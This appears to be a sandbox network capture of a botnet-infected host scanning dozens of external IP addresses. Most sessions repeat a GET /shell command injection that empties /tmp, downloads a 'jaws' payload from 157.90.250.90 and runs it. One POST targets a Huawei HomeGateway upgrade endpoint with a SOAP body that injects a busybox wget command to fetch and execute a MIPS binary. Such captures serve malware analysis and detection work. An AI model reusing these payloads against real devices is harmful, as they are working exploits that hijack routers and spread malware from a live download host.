                                                Dec 3, 2024 22:16:48.639434099 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19192.168.2.234885276.65.219.24480
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:48.647811890 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20192.168.2.233553444.223.88.22280
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.485599041 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21192.168.2.2353878219.159.129.9180
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.486377001 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22192.168.2.2342740126.110.141.4480
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.486924887 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23192.168.2.235199244.100.34.19080
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.487567902 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24192.168.2.2350606106.119.111.4980
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.488245010 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25192.168.2.234619659.87.238.4380
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.488986015 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26192.168.2.2336024161.83.220.8580
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.489536047 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                27192.168.2.2351966115.64.13.9180
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.490096092 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                28192.168.2.2350274122.157.177.13080
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.516793966 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                29192.168.2.2342718200.134.217.20080
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.517688990 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                30192.168.2.23598388.163.124.14380
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.519242048 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                31192.168.2.2339452150.32.225.13380
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.521588087 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                32192.168.2.2341426202.130.12.21280
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.523818016 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                33192.168.2.2350074178.167.225.2080
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.526132107 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                34192.168.2.2335752112.106.103.20780
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.528286934 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                35192.168.2.2344360156.101.171.5437215
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.529059887 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                Content-Length: 430
                                                Connection: keep-alive
                                                Accept: */*
                                                Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                36192.168.2.234269886.87.136.3080
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.530257940 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                37192.168.2.2351504120.125.222.8480
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.531188011 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                38192.168.2.2352012101.26.29.8480
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.531867981 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                39192.168.2.234170286.199.183.4080
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.532537937 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                40192.168.2.2337950159.180.151.11780
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.533227921 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                41192.168.2.2335558159.216.106.17380
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.533919096 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                42192.168.2.235434089.199.198.1180
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.534621000 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                43192.168.2.235367813.77.179.19280
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.535326958 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                44192.168.2.235948889.148.112.8280
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.536058903 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                45192.168.2.235574850.18.129.22480
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.536691904 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                46192.168.2.2356390201.216.93.11880
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.537381887 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                47192.168.2.233551019.67.64.3780
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.538028002 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                48192.168.2.2349242156.47.9.15980
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.538722038 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                49192.168.2.234238495.148.172.17080
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.539407969 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                50192.168.2.235588270.48.67.13280
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.540056944 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                51192.168.2.23455301.78.144.17880
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.540761948 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                52192.168.2.2356374163.247.225.17380
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.541435003 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                53192.168.2.2357510117.255.80.13180
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.542081118 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                54192.168.2.2354544137.84.118.5580
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.542745113 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                55192.168.2.2336100148.77.50.20680
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.543416977 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                56192.168.2.2346164120.53.85.17480
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.544080973 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                57192.168.2.2343316115.161.242.23180
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.544732094 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                58192.168.2.2350814189.63.67.24280
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.545363903 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                59192.168.2.2334050133.151.36.23780
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.546025991 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                60192.168.2.233374651.0.21.4280
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.546660900 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                61192.168.2.2345496161.115.163.8880
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.547308922 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                62192.168.2.2340354177.102.58.16080
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.547929049 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                63192.168.2.233669683.228.148.6880
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.548597097 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                64192.168.2.2337802205.37.220.22480
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.549242973 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                65192.168.2.233778666.28.161.17080
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.549973011 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                66192.168.2.2352248182.205.184.22080
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.550627947 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                67192.168.2.23440642.116.62.18180
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.551295042 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                68192.168.2.234121872.185.180.18880
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.551968098 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                69192.168.2.234060218.120.91.23780
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.552584887 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                70192.168.2.234886649.132.127.25480
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.553212881 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                71192.168.2.236092632.60.240.15580
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.553828001 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                72192.168.2.2333070116.198.57.1780
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.554455996 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                73192.168.2.2339680149.70.197.24580
                                                TimestampBytes transferredDirectionData
                                                Dec 3, 2024 22:16:49.555085897 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                User-Agent: Hello, world
                                                Host: 127.0.0.1:80
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                Connection: keep-alive


